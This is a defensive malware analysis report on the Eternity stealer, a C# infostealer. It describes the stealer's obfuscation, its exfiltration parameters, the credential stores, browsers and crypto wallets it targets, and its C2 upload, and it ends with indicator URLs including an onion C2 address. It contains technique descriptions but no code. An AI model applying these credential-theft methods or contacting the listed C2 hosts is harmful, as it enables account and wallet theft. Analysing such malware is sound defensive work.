- Author: Mehardeep Singh Sawhney
- Editor: Suchita Katira
Summary
Objective
The objective of this report is to give a clear understanding of the workings of Eternity stealer by providing a basic explanation of its techniques and methods.
The Eternity Stealer
This stealer is written in C# and is capable of stealing data from various well-known applications. This stolen data can either be used on its own to compromise user accounts or it can be used in coordination with other exploits. The key impact caused by this stealer is seen in the huge amount of PII stolen from users who are infected.
Basic Static Analysis
A quick strings and Portable Executable (PE) analysis on the sample yields a couple of hints. Strings such as mscoree.dll, and strings that contain the word stealer in them, were observed. PE analysis shows that the signature on the executable is .NET, which denotes that this is most likely a stealer written in C#.
Further analysis shows that most of the function names are obfuscated. Taking a look at the Main function, there is further obfuscation and noise, however, SSD and DS are two conspicuous functions, which seem to be widely used throughout the code.
Obfuscation
The SSD and DS functions use obfuscation to slow the analysis process down. The function SSD takes AES-encrypted arguments from the DS function and further encodes them. The strings that are obfuscated are encoded in Base64.
Upon deobfuscation of the string, it was deduced that the threat actor is constructing a link for the purpose of exfiltrating the data. The following parameters are used in the link for the communication:
| Parameters | Description |
|---|---|
| Pwds | Passwords Stolen |
| Cards | Credit Cards Stolen |
| Wlts | Wallets Stolen |
| Files | Files Stolen |
| User | User Information Stolen |
| Comp | Computer Information Stolen |
| IP | Retrieves IP Information from third-party API |
| Country | Retrieves Country from third-party API |
| City | Retrieves City from third-party API |
| Tag | Sets its value to Default (functionality is enigmatic) |
| Domains | Domain Information Stolen |
| AD | Active Directory Information |
Data Stealing
After the initialization of handlers for different types of stolen data, an array is initialized using the Create() function. This is a crucial point in the code since the Create() function instantiates the data stolen by the stealer and creates an array for it. This array will be consumed by a function responsible for pushing data to the C2.
Many stealer methods are present in the function, each specific to a particular software or application. The Eternity stealer has the capability to steal data from multiple applications, including Discord, Telegram, Google Chrome, and NordVPN.
| Applications Targeted by Eternity Stealer | |
|---|---|
| Credential Managers | Windows Vault, Credential Manager, KeePass, NordPass, 1Password, RoboForm |
| Gaming and Streaming Applications | Steam, Twitch, OBS |
| FTP Applications | FileZilla, WinSCP, CoreFTP, Snowflake |
| VPN Applications | NordVPN, EarthVPN, WindscripeVPN, AzireVPN |
| Messaging and Email Applications | Telegram, Discord, Pidgin, Outlook, FoxMail, MailBird, Viber, WhatsApp, Signal, Rambox |
| Wallets | Binance, Monero, BitcoinCore, DashcoinCore, LitecoinCore, Electrum, Exodus, Atomic, TonWallet, Jaxx, Coinomi, Daedalus, Zcash, Guarda, Wasabi, BitWarden |
| Browsers | Google Chrome, Firefox |
Credential Managers
The Eternity stealer has specific functions responsible for stealing credentials from credential managers. One of these functions is EnumerateCredentials().
Windows Vault
Windows Vault is a protected storage mechanism used by Windows for storing passwords from browsers, system information, etc. Built-in functions are used by the stealer for accessing credentials stored in Windows Vault. Different functions like VaultGetItem_WIN7() and VaultGetItem_WIN8() are used for different versions of Windows. The stealer enumerates all Vaults by calling VaultEnumerateVaults().
Credential Manager
Credential Manager is another protected storage mechanism that is used in relatively newer versions of Windows. It allows the user to view and manage stored credentials, such as passwords used for website authentication. Similar to Windows Vault, Credential Manager has its own built-in functions for enumeration. One of the functions, CredEnumerate, is used by the stealer to enumerate user-specific credential sets. Since there is no filter set, the function returns all credentials. The stealer also creates ReadCredential() function to parse the data based on conditions.
Gaming and Streaming Applications
The Eternity stealer is capable of stealing data from various gaming and streaming applications, including Steam, Twitch, and OBS.
Steam Gaming Platform
Steam is a popular gaming application that allows users to purchase games and a variety of in-game items through its community feature. The stealer looks for particular file extensions in the Steam directory. The ssfn files can be used to bypass Steam’s Steam Guard service, which is responsible for two-factor authentication, provided that the attacker has the user’s credentials. Also, it steals files with the .vdf extension, which are game-specific files that contain metadata and game-related information like the in-game items owned by the user.
OBS
OBS is a popular screen recording and live-streaming application. The stealer exfiltrates data such as profile information, database information, etc., from the application.
FTP Applications
The Eternity stealer extracts credentials from many FTP applications, such as WinSCP, FileZilla, and CoreFTP.
WinSCP
WinSCP is an open-source FTP client. Credentials from WinSCP can be stored in an encrypted format, which the stealer is capable of decrypting.
CoreFTP
CoreFTP is a free FTP client that stores passwords in an encrypted format. The stealer has a function for decrypting the passwords.
VPN Applications
NordVPN
NordVPN is a well-known VPN service provider. The Eternity stealer decrypts and decodes the stolen credentials.
Messaging and E-Mail Applications
Telegram
Telegram is a popular messaging application. The files and data revealing sensitive Telegram information, like session details, are exfiltrated.
Outlook
Outlook is a popular e-mail and information management application by Microsoft. The stealer decrypts various stolen passwords gathered from Outlook by accessing critical information from registry keys.
Wallets
The Eternity stealer steals data from multiple Cryptocurrency wallets.
Bitcoin Core
Bitcoin Core is an open-source blockchain management system and wallet. The blockchain and wallet information is exfiltrated by accessing data from registry keys.
Electrum
Electrum is a popular cryptocurrency wallet for users well-versed in cryptocurrency. The Electrum configuration files and retrieves key-value pairs are extracted.
Browsers
Different types of data from popular browsers, such as passwords, credit card details, etc., are obtained by the stealer.
Google Chrome
Various types of saved data from Chrome, including passwords, credit card details, and AutoFill details, are compromised. The passwords are extracted by enumerating a domain user’s session information, which contains MasterKey information. This is then used to decrypt passwords.
Firefox
The stealer is capable of stealing and decrypting stolen passwords from Firefox.
WiFi Passwords
The Eternity stealer exfiltrates network passwords by executing two simple netsh commands, provided by Windows.
Active Directory Enumeration
The Eternity stealer enumerates Active Directory information. It uses the managementObject class to run a WMI query to enumerate domain information. This information is used to determine whether the infected machine belongs to a domain or not.
File Grabber
The stealer has file-grabbing functionality. It prioritizes files with the .txt extension and categorizes them as important.
Location Details
The stealer stores information about the victim’s location, including city, country, and IP address. The data is obtained using a website and is formatted accordingly.
Network Operations
A specific URL is used to store the stolen data, which indicates the use of a C2 server. Further analyses of the Main function shows that the stealer makes web requests. The previously initialized array with the stolen data is uploaded to the C2 server.
Indicators of Compromise (IoCs)
| URLs |
|---|
| http://lightnogu5owjjllyo4tj2sfos6fchnmcidlgo6c7e6fz2hgryhfhoyd.onion/stealer/ |
| http://wasabiwallet.online:7777/ |
References
- CredEnumerateA function (wincred.h) – Win32 apps | Microsoft Learn
- RijndaelManaged Class (System.Security.Cryptography) | Microsoft Learn